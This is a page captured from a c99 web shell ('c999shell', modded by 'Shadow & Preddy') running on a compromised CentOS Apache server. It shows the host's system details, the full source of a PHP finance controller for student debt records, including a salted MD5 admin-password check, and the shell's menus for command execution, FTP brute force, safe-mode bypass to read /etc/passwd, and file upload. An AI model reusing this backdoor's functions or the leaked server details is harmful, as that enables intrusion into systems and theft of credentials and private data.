!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/eregis/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.89%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     finance.php (18.53 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include('rg_controller.php');
class 
finance extends Rg_controller {
    var 
$sess_prsItId "";
    var 
$sess_prsUsId "";
    
    public function 
__construct()
    {
        
parent::__construct();
        
$personId $this->session->userdata('UsPsCode');
        
$this->sess_prsItId 1;
        
$this->sess_prsUsId $personId;
        if(
substr($personId05)=='psout') {
            
$this->sess_prsItId 2;
            
$this->sess_prsUsId substr($personId5);
        }
    }
    
    function 
adminPass(){
        
$this->form_validation->set_rules('db',' ','trim|required|xss_clean');
        
$this->form_validation->set_rules('ses',' ','trim|required|xss_clean');
        
$this->form_validation->set_rules('prsItId',' ','trim|required|xss_clean');
        
$this->form_validation->set_rules('prsOrgId',' ','trim|required|xss_clean');
        
$this->form_validation->set_rules('Submit',' ','trim|xss_clean');
        if(
$this->input->post('Submit')){
            
$this->form_validation->set_rules('passwdHead',' ','trim|required|xss_clean');
        }
        if(
$this->form_validation->run() == true) {
            if(
$this->input->post('Submit') and !$this->input->post('method') and !$this->input->post('send')){
                
$this->load->model($this->config->item("rg_folder").'mo_rg_person','prs');
                
$this->prs->prsOrgId $this->input->post('prsOrgId');
                
$prs_qu $this->prs->getPassAdmin();
                if(
$prs_qu->num_rows()>0){
                    
$row_prs = (isset($prs_qu) && $prs_qu!=NULL) ? $prs_qu->row() : NULL;
                    
$in_pass MD5("O]O".$this->input->post('passwdHead')."O[O");
                    
$this->contents['ses'] = $this->input->post('ses');
                    
$this->contents['db'] = $this->input->post('db');
                    if(
$row_prs->UsPassword == $in_pass){
                        
$this->contents['res'] = "Y";
                    }else{
                        
$this->contents['res'] = "N";
                    }
                }else{
                    
$this->contents['res'] = "N";
                }
                
$this->contents['sub'] = $this->input->post('Submit');
            }else if(
$this->input->post('Submit') and $this->input->post('method')){
                
$this->load->model($this->config->item("rg_folder").'mo_rg_person','prs');
                
$this->prs->prsOrgId $this->input->post('prsOrgId');
                
$prs_qu $this->prs->getPassAdmin();
                if(
$prs_qu->num_rows()>0){
                    
$row_prs = (isset($prs_qu) && $prs_qu!=NULL) ? $prs_qu->row() : NULL;
                    
$in_pass MD5("O]O".$this->input->post('passwdHead')."O[O");
                    
$this->contents['ses'] = $this->input->post('ses');
                    
$this->contents['db'] = $this->input->post('db');
                    if(
$row_prs->UsPassword == $in_pass){
                        
$this->contents['res'] = "Y";
                    }else{
                        
$this->contents['res'] = "N";
                    }
                }else{
                    
$this->contents['res'] = "N";
                }
                
$this->contents['sub'] = $this->input->post('Submit');
                
$this->contents['med'] = $this->input->post('method');
            }else if(
$this->input->post('Submit') and $this->input->post('send')){
                echo 
"3";
                
$this->load->model($this->config->item("rg_folder").'mo_rg_person','prs');
                
$this->prs->prsOrgId $this->input->post('prsOrgId');
                
$prs_qu $this->prs->getPassAdmin();
                if(
$prs_qu->num_rows()>0){
                    
$row_prs = (isset($prs_qu) && $prs_qu!=NULL) ? $prs_qu->row() : NULL;
                    
$in_pass MD5("O]O".$this->input->post('passwdHead')."O[O");
                    
$this->contents['ses'] = $this->input->post('ses');
                    
$this->contents['db'] = $this->input->post('db');
                    if(
$row_prs->UsPassword == $in_pass){
                        
$this->contents['res'] = "Y";
                    }else{
                        
$this->contents['res'] = "N";
                    }
                }else{
                    
$this->contents['res'] = "N";
                }
                
$this->contents['sub'] = $this->input->post('Submit');
                
$this->contents['sed'] = $this->input->post('send');
            }
            
            
$this->output_detail($this->config->item("rg_folder")."v_confirmPassAdmin");
        }else{
            if(
$this->input->post('Submit')){
                
$this->contents['sub'] = $this->input->post('Submit');
            }
            
$this->output_detail($this->config->item("rg_folder")."v_confirmPassAdmin");
        }
    }

    
// ##### start callback
    
function checkAcY($str) {
        
$this->load->model($this->config->item("rg_folder").'mo_rg_termconfig','tmc');

        
$con_qu_tmc = array('tmcAcY' => $str);
        
$qu_tmc $this->tmc->qryTmc($con_qu_tmc,'','');

        if(
$str=='') {
            
$this->form_validation->set_message('checkAcY','กรุณาป้อน%s');
            return 
false;
        } else if(
strlen($str)!=4) {
            
$this->form_validation->set_message('checkAcY','%sจะต้องเท่ากับ 4 หลัก');
            return 
false;
        }

        if(
$qu_tmc->num_rows()) {
            return 
true;
        } else {
            
$this->form_validation->set_message('checkAcY','%sไม่ถูกต้อง');
            return 
false;
        }
    }
    
// ##### end callback
    
    // ##### start ตรวจสอบข้อมูลหนี้สิน
    
function checkDbt() {
        
$this->load->model($this->config->item("rg_folder").'mo_rg_curriculum','cur');
        
$this->load->model($this->config->item("rg_folder").'mo_rg_studyyear','sy');
        
$this->load->model($this->config->item("rg_folder").'mo_rg_term','tm');

        
$con_rs_cur = array('curStatus'    => 'Y');
        
$ord_rs_cur = array('curName'    => '');
        
$this->contents['rs_cur'] = $this->cur->get_options($con_rs_cur,$ord_rs_cur,'','','y');

        
$this->contents['rs_sy'] = $this->sy->get_options('','','','y');
        
$this->contents['rs_tm'] = $this->tm->get_options('','','','y');
        
$this->contents['acY'] = $this->session->userdata('acY');
        
$this->output($this->config->item("rg_folder")."v_checkDbt");
    }

    function 
beforeShowDbt() {
        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<span class="error">','</span>');
        
$this->form_validation->set_rules('curId','หลักสูตร','trim|required|xss_clean');
        
$this->form_validation->set_rules('syId','ชั้นปี','trim|required|xss_clean');
        
$this->form_validation->set_rules('acY','ปีการศึกษาที่เป็นหนี้','callback_checkAcY');
        
$this->form_validation->set_rules('tmId','ภาคการศึกษาที่เป็นหนี้','trim|required|xss_clean');

        if(
$this->form_validation->run() == true) {
            
$curId $this->input->post('curId');
            
$syId $this->input->post('syId');
            
$acY $this->input->post('acY');
            
$tmId $this->input->post('tmId');

            
$this->load->model($this->config->item("rg_folder").'mo_rg_curriculum','cur');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_studyyear','sy');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_term','tm');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_student','std');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_debt','dbt');
            
            
$this->cur->curId $curId;
            
$this->contents['qu_cur'] = $this->cur->get_by_key();

            
$this->sy->syId $syId;
            
$this->contents['qu_sy'] = $this->sy->get_by_key();

            
$this->contents['acY'] = $acY;
    
            
$this->tm->tmId $tmId;
            
$this->contents['qu_tm'] = $this->tm->get_by_key();

            
$con_rs_std = array('stdCurId'    => $curId,
                                
'stdSyId'    => $syId);
            
$ord_rs_std = array('stdCode');
            
$rs_std $this->std->qryStdJoinPf($con_rs_std,'',$ord_rs_std);

            
$arr = array();
            
$sumAmt 0;
            if(
$rs_std->num_rows()) {
                
$i 0;
                foreach(
$rs_std->result() as $row_std) {
                    
$con_qu_dbt = array('dbtStdId'    => $row_std->stdId,
                                        
'dbtAcY'    => $acY,
                                        
'dbtTmId'    => $tmId,
                                        
'dbtRefNo'    => '');
                    
$qu_dbt $this->dbt->getSumAmt($con_qu_dbt);
                    
//echo $this->db->last_query();
                    
$sumAmt += $qu_dbt;

                    
$arr[$i]['std'] = $row_std;
                    
$arr[$i]['dbt'] = $qu_dbt;
                    
$arr[$i]['url'] = "{'stdId':$row_std->stdId, 'acY':$acY, 'tmId':$tmId}";

                    
$i++;
                }
            }
            
$this->contents['arr'] = $arr;
            
$this->contents['sumAmt'] = $sumAmt;

            
$this->output($this->config->item("rg_folder")."v_beforeShowDbt");
        } else {
            
$this->checkDbt();
        }
    }
    
// ##### end ตรวจสอบข้อมูลหนี้สิน
    
    // ##### start บันทึกข้อมูลหนี้สิน 
    
function searchDebt(){
        
$this->load->model($this->config->item("rg_folder").'mo_rg_term','tm');
        
        
$this->contents['rs_tm'] = $this->tm->get_options('','','','y');
        
$this->contents['acY'] = $this->session->userdata('acY');
        
//echo $this->session->userdata('UsPsCode');
        
$this->output($this->config->item("rg_folder")."v_searchDebt");    
    }
    
    function 
addDebt(){
        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<span class="error">','</span>');
        
$this->form_validation->set_rules('stdCode','รหัสนักศึกษา','trim|required|xss_clean|integer');
        
$this->form_validation->set_rules('acY','ปีการศึกษาที่เป็นหนี้','callback_checkAcY');
        
$this->form_validation->set_rules('tmId','ภาคการศึกษาที่เป็นหนี้','trim|required|xss_clean');
        
        if(
$this->form_validation->run() == true) {
            
$stdCode $this->input->post('stdCode');
            
$acY $this->input->post('acY');
            
$tmId $this->input->post('tmId');
            
$method $this->input->post('method');
            
            
$this->contents['stdCode'] = $stdCode;
            
$this->contents['acY'] = $acY;
            
$this->contents['tmId'] = $tmId;
            
$this->contents['method'] = $method;
            
            
$this->contents['UsId'] = $this->sess_prsUsId;
            if(
$method=="editOrder"){
                
$this->contents['dbtSeq'] = $this->input->post('dbtSeq');
            }
            
            
$this->load->model($this->config->item("rg_folder").'mo_rg_person','prs');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_student','std');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_curriculum','cur');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_studyyear','sy');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_organization','org');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_debt','debt');
                        
            
$con_rs_prs = array('prsUsId'=> $this->sess_prsUsId'prsItId'=>$this->sess_prsItId);
            
$qu_prsDebtUDAuthority $this->prs->qryPrs($con_rs_prs);
            
$this->contents['qu_prsDebtUDAuthority'] = $qu_prsDebtUDAuthority;
            
            if(
$qu_prsDebtUDAuthority->num_rows()>0){
            
$row_prsDebtUDAuthority = (isset($qu_prsDebtUDAuthority) && $qu_prsDebtUDAuthority!=NULL) ? $qu_prsDebtUDAuthority->row() : NULL;
            
            
$this->org->orgId $row_prsDebtUDAuthority->prsOrgId;
            
$this->contents['qu_org'] = $this->org->get_by_key();
            
            
$qu_std $this->std->qryStudentForFinance($stdCode);
            
$this->contents['qu_std'] = $qu_std;
            
            
$row_std = (isset($qu_std) && $qu_std!=NULL) ? $qu_std->row() : NULL;
            
                if(
$qu_std->num_rows>0){
                    
$this->sy->syId $row_std->stdSyId;
                    
$this->contents['qu_sy'] = $this->sy->get_by_key();
                    
                    
$this->cur->curId $row_std->stdCurId;
                    
$qu_cur $this->cur->get_by_key();
                    
$this->contents['qu_cur'] = $qu_cur;
                    
                    
$row_cur = (isset($qu_cur) && $qu_cur!=NULL) ? $qu_cur->row() : NULL;
                    
                    
$this->load->model($this->config->item("ppc_folder").'mo_level','lv');
                    
$this->lv->levelId $row_cur->curElvId;
                    
$this->contents['qu_lv'] = $this->lv->get_by_key();
                    
                    
$con_rs_debt = array(
                    
'dbtStdId'    => $row_std->stdId,
                    
'dbtAcY'    => $acY,
                    
'dbtTmId'    => $tmId,
                    
'dbtOrgId'    => $row_prsDebtUDAuthority->prsOrgId,
                    
'dbtRefNo'    => ''
                    
);
                    
$this->contents['rs_debt'] = $this->debt->qryDbt($con_rs_debt);
                }
            }
            
            
$this->output($this->config->item("rg_folder")."v_addDebt");    
        }else{
            
$this->searchDebt();
            
/*$stdCode = $this->input->post('stdCode');
            $acY = $this->input->post('acY');
            $tmId = $this->input->post('tmId');
            $method = $this->input->post('method');
            
            echo $stdCode."<br>".$acY."<br>".$tmId."<br>".$method;*/
        
}
    }
    
    function 
debt_insert_update(){
            
$this->load->model($this->config->item("rg_folder").'mo_rg_debt','debt');
            
            
$this->load->library('form_validation');
            
$this->form_validation->set_error_delimiters('<span class="error">','</span>');
            
$this->form_validation->set_rules('stdCode','รหัสนักศึกษา','trim|required|xss_clean');
            
$this->form_validation->set_rules('acY','ปีการศึกษาที่เป็นหนี้','callback_checkAcY');
            
$this->form_validation->set_rules('stdId','รหัสนักศึกษา','trim|required|xss_clean');
            
$this->form_validation->set_rules('dbtDescription','รายละเอียด','trim|required|xss_clean');
            
$this->form_validation->set_rules('tmId','ภาคการศึกษาที่เป็นหนี้','trim|required|xss_clean');
            
$this->form_validation->set_rules('dbtAmt','จำนวนเงิน','trim|required|xss_clean');
            
$this->form_validation->set_rules('orgId','หน่วยงาน','trim|required|xss_clean');
            
            if(
$this->form_validation->run() == true) {
            
$method $this->input->post('method');
            
$stdCode $this->input->post('stdCode');
            
$stdId $this->input->post('stdId');
            
$acY $this->input->post('acY');
            
$tmId $this->input->post('tmId');
            
$dbtDescription $this->input->post('dbtDescription');
            
$dbtAmt $this->input->post('dbtAmt');
            
$orgId $this->input->post('orgId');
            
$dbtCreateUserId $this->session->userdata('UsLogin');
            
$dbtUpdateUserId =$this->session->userdata('UsLogin');
            
            if(
$method=="add"){
                
$this->debt->dbtStdId $stdId;
                
$this->debt->dbtTmId $tmId;
                
$this->debt->dbtAcY $acY;
                
$this->debt->dbtDescription $dbtDescription;
                
$this->debt->dbtAmt $dbtAmt;
                
$this->debt->dbtRefNo $this->input->post('dbtRefNo') ? $this->input->post('dbtRefNo') : '';;
                
$this->debt->dbtCreateDate date('Y-m-d H:i:s');
                
$this->debt->dbtCreateUserId $dbtCreateUserId;
                
$this->debt->dbtOrgId $orgId;
                
$this->debt->dbtUpdateDate date('Y-m-d H:i:s');
                
$this->debt->dbtUpdateUserId $dbtUpdateUserId;
                
$seq $this->debt->GetNextSeqByStIdAndAcYAndSe($stdId,$acY,$tmId);
                
$this->debt->dbtSeq $seq;
                
                
$this->debt->insert();
            }else if(
$method=="edit"){
                
$this->debt->dbtStdId $stdId;
                
$this->debt->dbtTmId $tmId;
                
$this->debt->dbtAcY $acY;
                
$this->debt->dbtSeq $this->input->post('dbtSeq');
                
$this->debt->get_by_key(TRUE);
                
                if(
$this->input->post('dbtRefNo')){
                    
$this->debt->dbtRefNo $this->input->post('dbtRefNo') ? $this->input->post('dbtRefNo') : '';
                    
$this->debt->dbtOrgId $orgId;
                    
$this->debt->dbtUpdateDate date('Y-m-d H:i:s');
                    
$this->debt->dbtUpdateUserId $dbtUpdateUserId;
                }else{
                    
$this->debt->dbtDescription $dbtDescription;
                    
$this->debt->dbtAmt $dbtAmt;
                    
$this->debt->dbtRefNo $this->input->post('dbtRefNo') ? $this->input->post('dbtRefNo') : '';
                    
$this->debt->dbtOrgId $orgId;
                    
$this->debt->dbtUpdateDate date('Y-m-d H:i:s');
                    
$this->debt->dbtUpdateUserId $dbtUpdateUserId;
                }
                
                
$this->debt->update();
            }else if(
$method=="del"){
                
$this->debt->dbtStdId $stdId;
                
$this->debt->dbtTmId $tmId;
                
$this->debt->dbtAcY $acY;
                
$this->debt->dbtSeq $this->input->post('dbtSeq');
                
                
$this->debt->delete();
            }
            
            if(
$this->input->post('dbtRefNo')){
                
$this->paymentDebt();
            }else{
                
$this->addDebt();
            }
        
            }else{
                if(
$this->input->post('dbtRefNo')){
                    
$this->paymentDebt();
                }else{
                    
$this->addDebt();
                }
            }
    }
    
// ##### end บันทึกข้อมูลหนี้สิน 
    
    // ##### start บันทึกข้อมูลหนี้สิน 
    
function searchPaymentDebt(){
        
$this->load->model($this->config->item("rg_folder").'mo_rg_term','tm');
        
        
$this->contents['rs_tm'] = $this->tm->get_options('','','','y');
        
$this->contents['acY'] = $this->session->userdata('acY');
        
//echo $this->session->userdata('UsPsCode');
        
$this->output($this->config->item("rg_folder")."v_searchPaymentDebt");    
    }
    
    function 
paymentDebt(){
        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<font color="red">','</font>');
        
$this->form_validation->set_rules('stdCode','รหัสนักศึกษา','trim|required|xss_clean');
        
$this->form_validation->set_rules('acY','ปีการศึกษาที่เป็นหนี้','callback_checkAcY');
        
$this->form_validation->set_rules('tmId','ภาคการศึกษาที่เป็นหนี้','trim|required|xss_clean');
        
        if(
$this->form_validation->run() == true) {
            
$stdCode $this->input->post('stdCode');
            
$acY $this->input->post('acY');
            
$tmId $this->input->post('tmId');
            
$method $this->input->post('method');
            
            
$this->contents['stdCode'] = $stdCode;
            
$this->contents['acY'] = $acY;
            
$this->contents['tmId'] = $tmId;
            
$this->contents['method'] = $method;
            
            
$this->contents['UsId'] = $this->sess_prsUsId;
            if(
$method=="payOrder"){
                
$this->contents['dbtSeq'] = $this->input->post('dbtSeq');
            }
            
            
$this->load->model($this->config->item("rg_folder").'mo_rg_person','prs');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_student','std');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_curriculum','cur');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_studyyear','sy');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_organization','org');
            
$this->load->model($this->config->item("rg_folder").'mo_rg_debt','debt');
                        
            
$con_rs_prs = array('prsUsId'=> $this->sess_prsUsId'prsItId'=>$this->sess_prsItId);
            
$qu_prsDebtUDAuthority $this->prs->qryPrs($con_rs_prs);
            
$this->contents['qu_prsDebtUDAuthority'] = $qu_prsDebtUDAuthority;
            
            if(
$qu_prsDebtUDAuthority->num_rows()>0){
                
$row_prsDebtUDAuthority = (isset($qu_prsDebtUDAuthority) && $qu_prsDebtUDAuthority!=NULL) ? $qu_prsDebtUDAuthority->row() : NULL;
            
                
$this->org->orgId $row_prsDebtUDAuthority->prsOrgId;
                
$this->contents['qu_org'] = $this->org->get_by_key();
                
                
$qu_std $this->std->qryStudentForFinance($stdCode);
                
$this->contents['qu_std'] = $qu_std;
                
                if(
$qu_std->num_rows()>0){
                    
$row_std = (isset($qu_std) && $qu_std!=NULL) ? $qu_std->row() : NULL;
                    
                    
$this->sy->syId $row_std->stdSyId;
                    
$this->contents['qu_sy'] = $this->sy->get_by_key();
                    
                    
$this->cur->curId $row_std->stdCurId;
                    
$qu_cur $this->cur->get_by_key();
                    
$this->contents['qu_cur'] = $qu_cur;
                    
                    
$row_cur = (isset($qu_cur) && $qu_cur!=NULL) ? $qu_cur->row() : NULL;
                    
                    
$con_rs_debt = array(
                    
'dbtStdId'    => $row_std->stdId,
                    
'dbtAcY'    => $acY,
                    
'dbtTmId'    => $tmId,
                    
'dbtOrgId'    => $row_prsDebtUDAuthority->prsOrgId,
                    
'dbtRefNo'    => ''
                    
);
                    
$this->contents['rs_debt'] = $this->debt->qryDbt($con_rs_debt);
                    
                    
                    
$this->load->model($this->config->item("ppc_folder").'mo_level','lv');
                    
$this->lv->levelId $row_cur->curElvId;
                    
$this->contents['qu_lv'] = $this->lv->get_by_key();
                }
            }
            
            
$this->output($this->config->item("rg_folder")."v_paymentDebt");    
        }else{
            
$this->searchDebt();
        }
    }
    
// ##### end บันทึกข้อมูลหนี้สิน 
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0162 ]--